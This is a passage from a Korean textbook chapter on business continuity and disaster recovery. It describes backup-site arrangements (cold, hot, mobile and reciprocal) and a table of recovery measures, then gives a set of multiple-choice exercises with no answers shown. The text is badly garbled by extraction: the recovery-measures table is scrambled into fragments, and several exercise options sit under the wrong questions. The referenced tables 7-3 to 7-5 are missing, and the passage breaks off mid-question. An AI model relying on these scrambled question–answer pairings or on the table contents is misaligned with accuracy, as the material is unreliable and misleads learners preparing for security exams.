325 o 사무적인 지원 절차(Clerical backup procedures) : 비상사태에 대한 계획 중 사무적인 지원절차로만 가능한 대책을 마련한다. o 상호계약(Reciprocal arrangement) : 이것은 두 회사 중에 어느 한 회사가 비상사태 일 때, 다른 회 사의 컴퓨터시스템의 일부 혹은 전체를 이용할 수 있도록 사전에 상호계약을 하는 것이다. 컴퓨터 시 스템의 상호이용이 가능하도록 변경관리시스템(change management system)에 대한 서면협의가 사전 에 이루어져야 한다. o 요새 접근방법(The fortress approach) : 이것은 재해가 발생되어도 컴퓨터실을 이전시키지 않고, 손 상된 컴퓨터시스템에 즉시 자금을 투자해서 원상회복 시키는 것이다. 이와 같은 대책은 가능한 손실을 축소하려는 것이지만, 모든 재해에 대한 접근방법이 될 수는 없다. o 편의시설만 구비된 고정된 컴퓨터실을 제공하는 경우("cold" start fixed centre) : 여기서 cold start 란 컴퓨터를 지원하는 전기공급, 주변제어장치, 통신연결 등(컴퓨터 설비를 제외한 주변장치를 포함한 편의제공시설만 가능)을 제공하는 움직일 수 없는 혹은 이동 가능한 건물에 대한 계약 규정을 말한다. 이것은 외부회사에서 고정된 장소로 비어있는 컴퓨터실을 제공하는 것이다. 이곳에는 필요한 전기, 주 변제어장치, 외부 통신연결, 등을 설치해 놓고, 서비스 이용자는 사전에 결정된 연간 예약금을 지불한 다. o 편의시설만 구비된 이동 가능한 컴퓨터실을 제공하는 경우("cold" start portable centre) : 이것과 위 편의시설만 구비된 고정된 컴퓨터실을 제공하는 경우 와의 차이는 설비가 이동가능하기 때문에, 주차 장과 같이 사전에 계약한 장소에 설치할 수 있다는 것이다. 이와 같은 대책의 장점은 기존 정보시스템 의 인접한 곳에 컴퓨터실을 설치할 수 있다는 것이고, 단점은 이와 같은 컴퓨터실을 마련하는데 소요되는 시간이 3일에서 10일 정도라는 것이다. o 편의시설은 물론 컴퓨터까지 구비된 컴퓨터실을 외부회사에 의뢰하는 경우("hot" start- external) : 여기서 hot start란 컴퓨터를 지원하는 전기공급, 주변제어장치, 통신연결 등(컴퓨터 설비와 주변장치를 포함한 편의시설도 가능)을 제공하는 움직일 수 없는 혹은 이동 가능한 컴퓨터 설비에 대한 계약규정 을 말한다. 이것은 외부회사의 서비스로서 하드웨어를 포함한 컴퓨터실에 대한 접근에 관한 규정을 충족시키고 있다. 비용은 중앙연산처리장치의 규모, 주변장치의 수와 형태, 소프트웨어 재고 등 에 따라 다르다. 이와 같은 대책의 장점은 고객입장에서 안전한 건물에서 즉각적으로 컴퓨터시스템을 운용할 수 있다는 것이고, 단점은 대부분의 경우 상당히 멀리 떨어진 장소에 이와 같은 건물이 마련되 고, 비용이 비교적 비싸다는 것이다. 선진 외국의 경우 이 대안이 가장 선호하는 것으로 나타나고 있으 며 국내에서도 비상복구 서비스를 외부에 아웃소싱하는 경향이 점차 증가하고 있다. o 편의시설은 물론 컴퓨터까지 회사 내부에서 마련하는 경우("hot" start-internal) : 이것은 편의시설은 물론 컴퓨터까지 구비된 컴퓨터실을 외부회사에 의뢰하는 경우("hot" start- external)와 같은 대책을 외 부회사에 의뢰하지 않고, 회사 내부에서 마련하는 것이다. 이와 같이 회사 자체에서 준비해 둔 컴퓨터 실은 비상사태 시 즉시 사용할 수 있다는 장점이 있지만, 컴퓨터 시스템에 대한 중복투자비용이 크다 는 것이 단점이다. o 편의시설은 물론 컴퓨터까지 구비된 컴퓨터실을 배달해 주는 경우(Mobile hot start or "computer on the back of a lorry") : 이것은 고객이 지정한 장소에 사전에 합의한 컴퓨터시스템을 확실한 시간 이내에 배달해 주는 계약규정이다. 컴퓨터시스템은 트레일러 안에 있고, 트레일러 자체가 컴퓨터실 기 능을 할 수 있도록 되어있고, 화물자동차에 의해서 지정된 장소까지 운송한다. 회사가 지정한 장소는 트레일러에 전기공급, 통신연결 등이 가능한 주차가능한 안전한 장소이어야 한다. 이와 같은 대 책의 장점은 사무실 가까이에 트레일러를 설치함으로써, 몇 시간 내에 빠른 도움을 받을 수 있다는 것 이고, 단점은 하드웨어의 종류가 제약되어 있고 트레일러 설치장소에 전기공급, 사용료 등 특별한 조치가 필 요하다는 것이다. 325
326 다. 전형적인 복구 대책 복구 대책들은 항상 중요한 업무 프로세스를 지원할 수 있어야 한다. 이러한 복구 대책들에는 다음과 같은 요소들에 대한 복구가 포함되어있어야 한다. o 사람과 설비 o 정보기술시스템, 네트워크와 자료 o 전력, 통신, 우편 등과 같은 중요한 서비스 o 서류기록, 관련 자료와 같은 중요한 자산 다음 [표 7-2]는 한국전산원에서 정리한 전형적인 복구 대책에 대한 설명이다. [표 7-2] 전형적인 복구 대책 위험 보안대책 전형적인 복구대책 설명 o 덜 중요한 업무처리용 하 드웨어 이용 o 기타 업무처리에 영향을 준다 o 개발 시험용 기계 혹은 간단한 통지에 다른 시스템의 여분의 능력 o 기타 업무처리에 영향을 준다. 의해서 을 이용 구입할 수 o 비상사태용 설비 이용 o 값비싼 대책 있는 대체 o 상업적인 복구 서비스 o 적절한 접근/장소 필요 하드웨어를 - 이동 서비스 컴퓨터 하 o 이용자와 네트워크가 연결되어 식별한다. - 공급업자의 계약에 의해서 드웨어의 야 한다. 제공되는 서비스 손실 혹은 대체 하드웨어 o 많은 량에 대해서는 비용이 많 에 적절한 - PC/중간규모 시스템 인도 이 소요됨 재해적인 s/w 및 에 대한 call-off계약 고장 주변장치가 o 호환성 유지에 많은 노력이 o 제3자와의 사전계약 설치되었다면, 소요됨 그리고 자료복사가 o 재해 후 즉각 주문 o 복구목적을 충족시킬 정도의 충분한 설비를 획득할 수 없는 되었다면, 위험 빨리 복구시킬 o 탄력 있고, 분산된 시스템 o 기술발전과 더불어 보다 타당 수 있다. 아키텍처 성 있는 대책이 됨 o 대체 하드웨어가 설치될 때까지 수작업처리 o 수작업으로는 달성할 수 없는 복구목적이 있음 o 백업복사는 손상되지 않아야 o 초기작업의 백업 함 컴퓨터 s/w 대체가능 한 o 새로운 s/w에 대한 엄격한 시 의 장애 업무처리 설비 o 수리될 때까지 수작업 험 및 단계별 실행과 같은 위험 감소조치 컴퓨터 시 o 적절한 s/w 전문기술을 o 복구목적이 달성될 수 없는 고장수 리, 혹 스템의 기 소유한 응급지원팀 위험 은 연속운영제 o 고장예방가능 아키텍처 o 값비싼 대책 술적 공 o 백업복사는 손상되지 않아야 장애 o S/W에 대한 백업 복사 함 자료손실 업무영 향 고 려해서백업빈 o 이동 가능한 매체(예로서, 테이프, 디스켓, CD-ROM) o 자료적재소요시간, 충분한 자 료 갱신 불가 도 결정 o 원격 저널링 (journalling), o 값비쌀 수 있지만, 신속한 복 326
327 네트워크 손실 PABX 혹 은 ACD 시 스템의 손 실 주요 직 원 활용불가 서비스 공급업의 실패 설비에 대 한 손실 혹 은 접근불능 탄력 있는 네 트워크 설계 혹은 대체가능 한 서비스 대체장비 의 식별 및 제공 핵심 직원에 대한 의존 축 소 주요 공급업자 들에 대한 의존 축소 대체설비 에 대한 식별 및 제공. 적절한 전력, 전화, 컴 퓨터 네트워크 등 전자 도약(vaulting) o 실시간 디스크 복사 o 탄력 있는 네트워크 설계 o 대체가능한 케이블 선 o 대체가능한 서비스 접근 점 및 교환 노드(node) o 대체가능한 접근방법 o 가상적인 사설 네트워크 o 상업적인 복구 서비스, 예 로서, 트레일러에 대체가능 한 PABX o 교차훈련 o 외부위탁 o 모든 주요 행위 문서화 o 임시직원 채용 파악 o 활발한 공급업자 관리 o 단순한 통지로 대체가능 한 공급업자 파악 o 한 공급업자와의 업무량 제한 o 조직 내부 혹은 외부에 준비된 설비의 가용성을 식 별하고 탐지한다. o 조직/집단 내에 공공용으 로 준비된 설비 o 상업용 복구 서비스 구 가능 o 값비싼 대책, 디스크간 거리제 한, 즉각적인 복구 가능 o 사 설 네트워크만 통제 가능 o 서비스 제공자가 위험 o 접근 및 장소 가능해야 함. 케 이블 설치시간 소요, 무선도 가 능함 o 갱신되어져야 한다. o 다른 위험이 발생 가능 o 유지관리하기 어려움 o 기술직원 파악이 곤란 o 서비스 공급업자들에게 업무 지속성/보안을 주지시킴 o 소요시간 내에 가용 불가할 수 있음 o 대부분 비용-효과 분석이 불 가 o 이용 가능한 설비를 구비해야 함 o 조직 통제 하에서, 사전에 필 요한 설비를 구비 다음 [표 7-3]은 금융감독원에서 정리한 비상사태 유형에 대한 설명이다. 327
328 다음 [표 7-4]는 백업센터의 유형을 구분한 것이다. 아래 [표 7-5]는 금융기관에 적용되는 금융감독원의 권고 사항으로 백업 센터의 유형별로 재해 발생 시 복구 시간 및 각 장/단점에 대해 요약하였다. 재해 발생 시 Mirror, Hot, Warm, Cold 순으로 장애 에 대한 대처와 복구 능력이 높음을 알 수 있다. 328
329 제 7장. 업무 지속성과 재난 복구 연습 문제 329
330 1. 백업은 전산 장비의 고장이나 사고에 대비하 여 파일 또는 데이터베이스를 복사해 두는 행위 를 말한다. 데이터 백업의 목적이 아닌 것은? 1 일반 사용자의 실수로 인한 데이터의 소실 2 중요한 시스템 파일의 소실 3 하드웨어의 오류로 인한 데이터의 소실 4 자연재해에 의한 데이터의 소실 2. 백업은 전산 장비의 고장이나 다양한 종류의 사고에 대비하여 파일 또는 데이터베이스를 복사 해 두는 행위를 말한다. 백업의 종류에 대한 설 명 중 잘못된 것은? 1 Day-zero Backup은 시스템 설치 후 사용자들 이 시스템 사용 전에 모든 파일과 프로그램을 백업하는 것 2 Full Backup은 일반적 기준에 의해 주기적 으로 시스템 전체를 백업하는 것 3 Incremental Backup은 응용프로그램 추가/ 패치 등 특정 이벤트 후 이전 백업 후 변경된 파일만 백업하는 것 4 Full Time Backup은 시간을 스케줄링한 후 주기적으로 시스템 전체를 백업하는 것 3. 전사적 BCP와 DRP를 포함한 조직의 업무 연 속성과 생존을 보장하기 위한 계획에 대한 궁극 적인 책임은 누구에게 있는가? 1 최고경영자(CEO) 2 정보담당임원(CIO) 3 보안담당임원(CSO) 4 재무담당임원(CFO) 4. 백업센터 중 주 센터와 동일한 백업센터를 구 축하여 평상시에도 동일한 데이터를 처리하며 주 센터 재해발생 즉시 업무 대행이 가능한 백업센 터의 유형은 무엇인가? 1 Warm site 2 Cold site 3 Hot site 4 Mirror site 5. 다음 중 업무지속성 계획이 추구하는 가장 중 요한 목적은 무엇인가? 1 재해 또는 재난 등의 사고로 인한 조직의 업무 중단을 위협하는 위협요인의 극복 2 업무 연속의 실패로 인한 대외 신인도 저하의 방지 3 신속한 서비스의 지속적인 제공을 통한 고객 불편의 최소화 4 정형화된 업무지속성 계획의 수립과 지속적인 훈련에 따른 업무 능력의 극대화 6. 업무지속성 계획과 재난복구 계획은 정보보호 의 통제 대책 중 어떤 종류의 통제에 해당하는 가? 1 교정 통제(Corrective Control) 2 예방 통제(Preventive Control) 3 탐지 통제(Detective Control) 4 비상 통제(Contingency Control) 7. 보안 사고로 인한 시스템 손상을 대비하는 방 법 중 거리가 먼 것은? 1 테이프 백업 장치를 이용한 데이터 백업 2 비상용 복구 디스크 준비 3 시스템 로그인 암호 파일이 저장된 디스켓 준비 4 백업 도메인 컨트롤러 설치 8. 다음 중 업무지속성 계획(BCP-Business Continuity Plan) 및 재난복구 계획(DRP-Disaster Recovery Plan)의 기본 개념에 대한 설명 중 틀 린 것은? 1 재해는 정상적인 업무 처리에 심각한 지장을 초래할 수 있는 사건들을 말한다. 2 재해사건 중 재난(catastrophe)은 처리시설 등의 파괴로 인한 장기 중단의 사건으로 대체 처리 설비를 필요로 한다. 3 재해사건 중 재해(Disaster)는 하루 이상의 긴 시간 동안에 업무가 중단될 수 있는 사건으로 대체처리 설비를 필요로 한다. 4 모든 서비스의 중단은 재해 또는 재난으로 분류한다. 330
331 9. 다음 중 업무지속성 계획(BCP) 및 재난복구 계획(DRP)에 대한 설명으로 틀린 것은? 1 BCP는 조직의 비즈니스 관점에서 발생 가능 한 모든 위협요소를 평가하여 조직의 업무 수행에 영향을 미칠 수 있는 핵심 업무를 선별하여 업무 지속을 위한 계획을 수립하는 것이다. 2 DRP는 BCP의 일부로서 특히 IT 시스템의 재난 상황에 대처하기 위하여 데이터센터나 IT 시스템의 가동을 보장하기 위한 계획이다. 3 BCP가 DRP보다 복구해야 하는 업무 또는 응용의 범위가 더 넓다. 4 BCP과 DRP는 동일한 개념으로 포함 관계가 없다. 12. 업무연속 또는 재해복구를 위한 백업센터의 유형 중 장애에 대한 내성(tolerance)이 높은 순 서대로 나열한 것은? 1 Hot > Warm > Cool > Mirror 2 Cool > Hot > Warm > Mirror 3 Mirror > Cool > Warm > Hot 4 Mirror > Hot > Warm > Cool 13. 업무지속성 계획의 논리적 근거가 되는 것으 로 재난 또는 재해사건 별로 업무에 미칠 수 있 는 영향을 피해규모와 복구에 소요되는 시간 등 을 고려하여 분석하고 그 결과를 기초로 구체적 인 업무복구목표와 복구를 위한 우선순위를 설정 하는 절차를 무엇이라 하는가? 10. 기업 생존에 치명적 손상을 입히기 이전에 업무를 재개해야 하는 목표시간으로 대상 업무의 민감도(Time sensitivity)와 장애에 대한 내성 (Tolerance)으로 주요 업무의 복구 순서를 결정하 는 요인이 되는 것을 의미하는 것으로 MTD(Maximum Tolerable downtime)와 의미가 상통하는 것은 무엇인가? 1 RSO(Recovery Scope Objective) 2 BIA(Business Impact Assessment) 3 DRP(Disaster Recovery Planning) 4 MTD(Maximum Tolerable Downtime) 14. 정보처리 능력의 목표복구시간대(RTO)를 결 정하는 가장 중요한 성격은? 1 한계복구시간(CRT, Critical Recovery Time) 2 목표복구범위(RSO, Recovery Scope Objective) 3 목표복구시간(RTO, Recovery Time Objective) 4 백업센터유형(BCO, Backup Center Objective) 1 처리되는 데이터의 중요도(criticality)에 따라 2 영향 받는 업무의 중요도(criticality)에 따라 3 처리되는 시스템의 구축비용에 따라 4 재난 사건의 중요도(criticality)에 따라 11. 재해에 대한 일반적인 분류 기준은 자연 재 해, 인적 재해, 기술적 재해로 분류할 수 있다. 테러, 화재, 지진, 홍수 등과 같은 자연 재해에 대한 복구 대책 중 관련성이 먼 대책은 어느 것 인가? 1 이중화 2 중요 데이터의 백업 및 소산 3 백업 및 대체 요원 4 재해복구 센터의 구축 및 운영 331
332 15. 재난복구계획의 신뢰성을 높이고 유효성을 보장하기 위해 가장 타당한 방법은 재난복구계획 의 테스트 계획이다. 다음 중 재난복구계획의 테 스트 계획에 대한 설명 중 잘못된 것은 무엇인 가? 1 Checklist : 재난복구계획(DRP)의 계획서 및 절차서를 각 업무단위의 담당자에게 나누어 주고 계획의 절차나 오류를 점검하는 테스트 계획이다. 2 Structured Walk-Through : 실제 비상사태가 발생했다는 가정 하에서 시스템 운영 관련 주요 관리자와 직원들이 비상모임을 갖고 복구절차를 모의 테스트하는 단계이다. 실제 백업장소에서 실시하는 것이 아니라는 것이 아래의 Parallel Test와 다른 점이다. 3 Parallel Test: : Parallel Test는 재난복구절차의 전체적인 테스트로 관련된 전 직원이 동원 되며 실제 백업대체 장소에 가서 복구절차에 따라 움직인다. 그러나 실제 데이터로 하는 것이 아니라, 운영시스템 및 데이터와는 별로 도 미리 준비된 가상의 데이터와 시스템으로 하는 것이 다음 단계의 Full-Interruption Test 와 다른 점이다. 4 Full-Interruption Test : 실제로 재난이 발생할 때와 동일한 운영 시스템과 데이터로 Test를 수행한다. 물론 제일 정확한 방법이지만 거의 사용되지 않는다. 이 방법은 테스트 자체가 재난이 될 수도 있다. 16. 다음은 종합적인 업무연속성계획을 수립함에 따른 기대효과를 기술한 것이다. 가장 중요한 기 대효과부터 순서대로 기술한 것은 다음 중 어느 것인가? a. 보험료 감소 b. 물리적 보안 및 데이터 보안 강화 c. 조직 운영의 연속성 제공 d. 조직의 자산 보호 강화 17. 다음은 업무연속성계획을 수립하는 활동들 을 열거한 것이다. 올바른 순서대로 기술한 것 은? a. 잠재적 재해를 예상한다. b. 핵심 기능을 식별한다. c. 업무연속성 전략을 선정한다. d. 핵심 기능을 지원하는 자원을 식별한다. 1 a, b, c, d 2 a, c, b, d 3 b, a, d, c 4 b, d, a, c 18. 업무연속성계획을 수립하기 위한 개시 (Initiation)단계에서 수행하는 활동이 아닌 것은? 1 업무연속성에 대한 요구사항을 도출한다. 2 경영층의 지지를 확보한다. 3 업무연속성계획의 필요성에 대해 조직원들 에게 인식시킨다. 4 위험에 대한 잠재적 손실을 도출한다. 19. 업무연속성계획 수립 시 위험분석 단계에서 업무연속성 계획 수립 담당자가 고려해야 할 요 소가 아닌 것은? 1 통제(control)의 초기 투자 금액 결정 2 통제의 지속적인 유지관리 비용 결정 3 여러 통제들을 구현시 우선순위 결정 4 통제들의 이행 주체 20. 업무연속성계획 수립 단계는 크게 개시 단계, 계획수립 단계, 운영관리 단계로 구분 할 수 있 다. 다음 중 계획수립 단계에서 수행하는 활동이 아닌 것은? 1 업무연속성전략 수립 2 비상대응 및 운영계획 수립 3 업무연속성 계획서 개발 4 업무영향분석 1 a, b, c, d 3 c, d, b, a 2 c, b, a, d 4 d, b, c, a 332
333 21. 처음으로 업무연속성계획을 수립하는 조직에 가장 적합한 접근방식은 어느 것인가? 1 bottom-up 접근방식으로 개발 2 동종업계 타 회사의 업무연속성계획을 그대로 적용 3 백업서비스 제공업체가 제공한 업무연속성 계획을 그대로 적용 4 top-down 접근방식으로 개발 22. 업무연속성 계획 수립단계 중 위험분석 단계 에 포함되지 않은 활동은 다음 중 어느 것인가? 1 응용시스템의 우선순위 부여 2 테스트 절차 개발 3 위협에 대한 조직의 영향 평가 4 취약성 평가 23. 업무연속성 서비스 제공업체 선정을 위한 기 준으로 가장 거리가 먼 것은? 1 주요 설비의 위치 2 동일 업종의 수행 경험 3 하드웨어, 소프트웨어 및 운영요원 지원 4 제공업체의 회사규모 24. 비상대응 절차의 목적과 가장 거리가 먼 것 은? 계획을 수립한다. 2 주요 대형사고에 대한 예방 및 대응 활동이 업무연속성계획에서 다루어져야 한다. 3 업무연속성계획이 수립되어 있으면 재해 발생 시 시간 및 금전상의 손실이 발생하지 않는다. 4 최악의 시나리오를 가정하여 업무연속성계획 을 수립한다. 26. 응용시스템 및 데이터에 대한 가장 최선의 업무연속성 전략은 정기적인 백업 및 안전한 원 격지에 저장하는 것이다. 이와 관련한 의사결정 사항 중 가장 중요하지 않은 것은? 1 백업 주기 2 백업된 정보의 원격지 저장 주기 3 백업매체 사용 주기 4 백업 매체 운송 주기 27. 업무연속성계획의 효과성 및 각 절차들의 정 확성을 확인하기 위해 업무연속성계획을 테스트 해야 한다. 다음 중 업무연속성계획의 테스트에 서 다루어지는 항목이 아닌 것은? 1 업무연속성 계획의 중요성 2 복구 팀간의 조정(coordination) 3 내/외부 상호 통신능력 4 정상 운영으로 복귀 1 인명 피해를 예방하거나 최소화 한다. 2 업무 복구에 필요한 최소한의 자원들을 식별 한다. 3 시설물 및 장비에 대한 피해를 예방하거나 최 소화한다. 4 핵심 업무 기능의 손실(degradation)을 예방 하거나 최소화한다. 28. 다음 중 업무연속성계획 테스트 시나리오에 포함되지 않은 것은? 1 재해 종류 설명 2 피해 범위 3 예상 중단(outage) 기간 4 테스트 수행 일자 25. 다음 중 업무연속성계획에 대한 설명으로 옳 지 않은 것은? 1 조직의 규모가 클 경우 전사(Enterprise)차원에 서는 매체 통제, 위기관리, 커뮤니케이션 등에 대한 계획을 수립하고, 사업부(Business Unit Level)차원에서는 비상 대응, 복구, 업무 재기 333
334 29. 업무연속성계획을 검증하는 가장 효과적인 방법은 다음 중 어느 것인가? 1 업무연속성 정책 및 절차 검토 2 훈련 및 테스트 3 검토 및 교육 4 리허설 및 감사 30. 다음은 업무연속성관리에 대한 인식제고 프 로그램에 관한 설명이다. 틀린 것은? 1 정기적인 교육을 통해 재해 예방 및 대응에 대한 인식을 제고한다. 2 업무연속성관리에 대한 책임이 부여된 조직 만을 대상으로 교육계획을 수립한다. 3 뉴스레터 발송, 포스터 부착, 비디오 제작 및 집합 교육 등 다양한 방법을 이용하여 프로그램을 개발한다. 4 업무연속성계획의 주요 내용, 업무연속성계획 의 중요성, 업무연속성관리 책임이 부여된 조직 등에 대한 내용을 포함하여 인식제고 프로그램을 개발한다. 31. 다음은 업무연속성계획의 변경관리에 대한 설명이다. 가장 적합하지 않은 것은? 1 모의 훈련 및 테스트 수행 후 수행 결과를 반영하여 업무연속성계획을 변경한다. 2 업무연속성계획을 최소한 년1회 이상 변경하 도록 업무연속성관리 정책에 명시해야 한다. 3 업무연속성계획의 모든 변경사항에 대해 모든 임직원이 숙지할 수 있도록 사내 게시판을 이용하여 공지한다. 4 변경을 통해 업무에 잠재적인 영향이 발생된 다면 변경에 따른 영향분석을 수행하고 직원, 시스템, 통신을 위한 최소한의 요구사항을 확 인한다. 32. 효과적인 업무연속성전략의 구현을 위해서는 우선적으로 지휘, 통제, 의사소통 구조를 구축해 야 한다. 이에 대한 설명 중 적합하지 않은 것 은? 직과의 의사소통, 주요 전략적 의사결정을 수 행하는 등 전반적인 권한과 통제를 수행한다. 2 중앙통제팀은 조직 내 핵심업무나 주요 지원 기능을 담당하는 담당자로 구성되며 재해 발생 시 비상통제센터에 위치하여 활동한다. 3 업무복구팀은 중앙통제팀을 지원하기 위한 하부조직으로서 자신의 영역에서 업무복구 계획을 수립, 실행하며 직원 및 고객과의 지속적인 연락을 행할 책임이 있다. 4 중앙통제팀과의 합의 하에 최고경영층으로 부터 승인된 업무연속성전략이나 계획은 계획의 일관성이나 효과성을 위해 당분간 변경될 수 없다. 33. 다음은 통합적인 업무연속성계획을 수립하기 위해 필요한 세부적인 계획과 이들 간의 관계에 대한 설명이다. 가장 적합하지 않은 것은? 1 전반적인 복구노력을 조화/통제하기 위한 마스터플랜. 2 위기관리, 대외 홍보, 구제 그리고 문서의 복구 등 조직 전반에 걸친 조화/통제되어야 할 활동을 위한 일련의 계획 3 모든 업무 프로세스 및 주요 지원기능을 위한 개별 계획 4 개별 계획은 개별 업무복구팀에 의해 개발 되고 마스터플랜에 의해 이들 간의 조화/통제 를 위한 계획이 작성된다. 34. 업무지속성을 위한 백업처리능력 대안으로써 Hot site, Mirror site, Warm site가 있는데 이중 가장 빠르게 백업을 제공하는 순서를 기술한 것 은? 1 Hot site, Warm site, Mirror site 2 Hot site, Mirror site, Warm site 3 Mirror site, Warm site, Hot site 4 Mirror site, Hot site, Warm site 1 최고경영층/이사회는 위기관리, 관련 외부 조 334
335 35. 다음은 업무연속성계획에 대한 설명이다. 가 장 적합하지 않은 것은? 39. 다음 중 업무연속성계획이 추구하는 가장 중 요한 목적은? 1 전산부서가 책임과 권한을 가지고 업무연속성 계획을 수립, 유지 관리해야 한다. 2 업무연속성을 위한 전략을 수립하기 위해서는 업무영향분석을 통해 이루어져야 한다. 3 업무영향분석결과를 기초로 업무복구 목표 시간 및 복구를 위한 최소한의 요구사항이 결정된다. 4 업무연속성계획은 IT부서에서 작성한 비상 계획 및 재해복구계획에 기초하여 주요 조직 단위에서 업무의 연속성을 보장하기 위해 작성한 일련의 계획이다. 36. 업무연속성계획을 실효성을 확보하는 전략 중 가장 좋은 것은 무엇인가? 1 정책과 절차 2 훈련과 테스팅 3 검토와 테스팅 4 리허설과 감사 37. 업무연속성계획(BCP)을 검토할 경우, 정보보 호관리자는 다음 시나리오 중에서 가장 중요하게 검토해야 하는 것은 어느 것인가? 1 가장 발생확률이 높은 시나리오 2 낙관적인 시나리오. 3 비관적인(최악의) 시나리오 4 비용이 가장 많이 소요되는 시나리오 38. 업무연속성계획에 대한 설명 중 틀린 것은? 1 업무연속성관리라는 일상적인 관리활동의 결과로서의 문서이다. 2 비즈니스의 중단 없는 수행을 위한 완벽한 방어태세를 구축하기 위한 계획이다. 3 정보기술 보다는 비즈니스의 복구에 초점을 두어 작성되어야 한다. 4 IT 비상계획이나 재난복구 계획을 포함한다. 1 신속한 서비스 재개를 통한 고객 불편의 최소화 2 재해로 인한 조직의 생존성 위협으로부터 지속적인 업무의 수행 3 고품질의 대량생산을 위한 중단 없는 연속된 업무의 흐름 4 대외 신인도 저하 방지 40. 업무연속성관리에 대한 설명 중 틀린 것을 모두 고르면? 1 업무연속성관리는 정보시스템의 비상계획 및 재난복구에 대한 활동을 의미한다. 2 업무연속성관리는 업무연속성계획의 계획, 수립, 시험 및 보수 등을 포함하는 관리행위 를 의미한다. 3 업무연속성관리는 모든 비즈니스 업무의 중단 없는 운영을 목적으로 한다. 4 업무연속성관리의 주요 통제목표는 목표복구 시간과 목표복구대상이다 41. 업무연속성 전략수립을 위해 사용되는 기반 자료를 다음 중에서 선택하시오. (1) 업무 중요도 분석결과 (2) 위험분석 결과 (3) 업무영향분석 결과 (4) 복구 우선순위 평가결과 1 1,2,3,4 2 1,2,3 3 2,3,4 4 2,3 335
336 42. 다음 지문의 경우, 단위업무 B의 중요도 등 급은 조정되어야 하는가? 조정되어야 할 경우 몇 등급으로 조정되어야 하는가? 어떤 조직의 업무연속성 관리체계 프로젝트 수행 중 업무 프로세스 분석을 통한 업무 단위별 중요 도 등급을 부여하고 있다. 총무부의 업무를 처리하 는 단위업무 A의 업무결과 A'가 단위업무 B에 전 달되어야만 회계업무 처리가 이루어질 수 있으며 회계업무가 처리되어야만 급여지급 업무인 단위업 무 C가 수행될 수 있다. 인터뷰 및 설문조사 수행 결과 단위업무 A의 중요도 분석결과(5등급 척도)는 1등급, 단위업무B의 분석 결과는 2등급, 단위업무 C의 분석결과는 1등급이 산출되었다. 1 조정될 필요 없다 2 3등급으로 조정되어야 한다. 3 4등급으로 조정되어야 한다. 4 1등급으로 조정되어야 한다. 43. 재해복구계획(Disaster Recovery Planning)의 목적에 대한 설명으로 가장 적합한 것은? 1 재해로 인한 피해로부터 조직 보호 2 재해 발생 확률 계산 3 재해가 실제 발생하는 확률 대비 복구 계획에 필요한 비용의 산정 4 가장 적합한 대체 백업설비 선정 44. 위험평가 절차 중 가장 마지막 활동은 다음 중 어느 것인가? 1 가능한 위협 고려 2 복구 우선순위 부여 3 잠재적 영향 평가 4 핵심 요구사항 평가 45. 아래와 같은 경우 년간 기대 손실(ALE : Annualized Loss Exposure)는 얼마인가? - 위험발생 빈도수 : 년 10회 - 위험 1회 발생시 A부서에 발생된 손실 : 1억원 - 위험 1회 발생시 B부서에 발생된 손실 : 2천만 원 1 12억 원 2 1억 2천만 원 3 1천 2백만 원 4 120억 원 46. 아래와 같은 경우 위험을 감소함으로써 발생 하는 이익은 얼마인가? - 통제가 없는 경우 발생하는 위험 : 1억 2천만 원 - 통제가 수립되어 있는 경우 발생하는 위험 : 5천 만 원 - 통제 유지비용 : 3백만 원 - 위험발생 빈도 : 년 10회 - 통제가 수립되어 있는 경우 감소되는 손실 : 5백 만 원 1 6천 7백만 원 2 7천만 원 3 6백 7십만 원 4 4천 5백만 원 47. 데이터 보호를 위한 예방활동으로 가장 거리 가 먼 것은? 1 비밀번호 부여 2 디스크 미러링(disk mirroring) 3 감사 증적(audit trails) 4 RAID(Redundant Array of Independent Disk) 48. 다음 중 피해평가 단계에서 고려해야 할 항 목으로 가장 거리가 먼 것은? 1 비상사태 또는 중단 원인 2 조직 임무에 가장 중요한(mission critical) 시스템의 종류 3 추가로 발생 가능한 중단 또는 피해 4 비상사태로 영향 받은 지역 49. 금융기관과 같은 대부분의 조직은 고객, 주 주, 시장에서의 믿음이나 신뢰성이 매우 중요하 기 때문에 재해 발생 시 언론매체에 대한 통제가 중요하다. 다음 중 언론매체 통제에 대한 설명으 로 가장 적합하지 않은 것은? 1 사전에 언론매체 통제 계획을 수립하고 보도 자료를 준비한다. 2 사전에 재해 발생 시 언론매체를 다루는 대변인을 지정한다. 3 자주 질문 받는 항목(FAQ)을 사전에 준비 한다. 4 재해가 발생하여 언론매체에 보도 자료 발표 할 경우 조직에 불리한 영향을 미칠 내용을 발표해서는 안 된다. 336
337 50. 복구절차에는 적절한 복구 팀이 할당되어야 한다. 다음 중 복구 팀이 수행해야 할 활동들로 서 복구절차에 포함되지 않는 것은? 1 내외부 이해 관계자에게 공지 2 필요한 작업공간 확보 3 필요한 하드웨어 장비 확보 및 설치 4 주요 정보 백업 55. 재해에 대응하기 위한 평상시 활동으로 가장 거리가 먼 것은? 1 데이터, 응용시스템, 운영시스템의 백업 및 원격지 저장 주기 결정 2 중요 시스템의 이중화(redundancy) 구성 3 재해등급에 따라 재해 분류 4 시스템 구성요소 및 요구사항 문서화 51. 비상대응 절차의 목표로 가장 거리가 먼 것 은? 1 생명 보호 2 손실 통제 3 재산 보호 4 이윤 극대화 52. 재해복구 계획을 개시하기 위한 의사결정은 어느 단계에 이루어지는가? 56. 복구대책들은 다음과 같은 요소들에 대한 복 구가 포함되어야 한다. 이 중 적합하지 않은 것 은? 1 핵심 직원 및 주요 설비 2 컴퓨터, 네트워크 및 자료. 3 서류기록 또는 관련 자료 4 고객 1 재해 확인 후 2 피해 통제 전 3 피해 평가 및 확인 후 4 비상시스템 개시 전 53. 응용시스템 복구계획에 대한 설명으로 가장 적합하지 않은 것은? 1 응용시스템간의 우선순위에 따라 복구 일정을 수립한다. 2 정보의 긴급성에 따라 응용시스템의 복구 일정을 수립한다. 3 응용시스템 사용자들이 수용할 수 있는 (acceptable) 중단시간에 따라 복구 일정을 수립한다. 4 응용시스템 프로그래머들이 참을 수 있는 (tolerable) 중단시간에 따라 복구 일정을 수립 한다. 57. 처리능력의 백업대안으로서 상호계약 (reciprocal arrangement)에 의한 방법이 있다. 이 에 대한 설명으로 적합하지 않은 것은? 1 두 회사 중 어느 한 회사가 비상사태일 때, 다른 회사의 시스템의 일부 또는 전체를 사용 할 수 있도록 사전에 계약하는 것이다. 2 상호계약에 의해 한 회사의 시스템을 일정 비용을 지불하고 비상시에 사용하는 방법이 다. 3 실제 비상사태가 발생했을 경우, 상호계약에 의한 처리능력의 백업이 효과적이지 못할 수가 있다. 4 비상사태 발생 시 컴퓨터 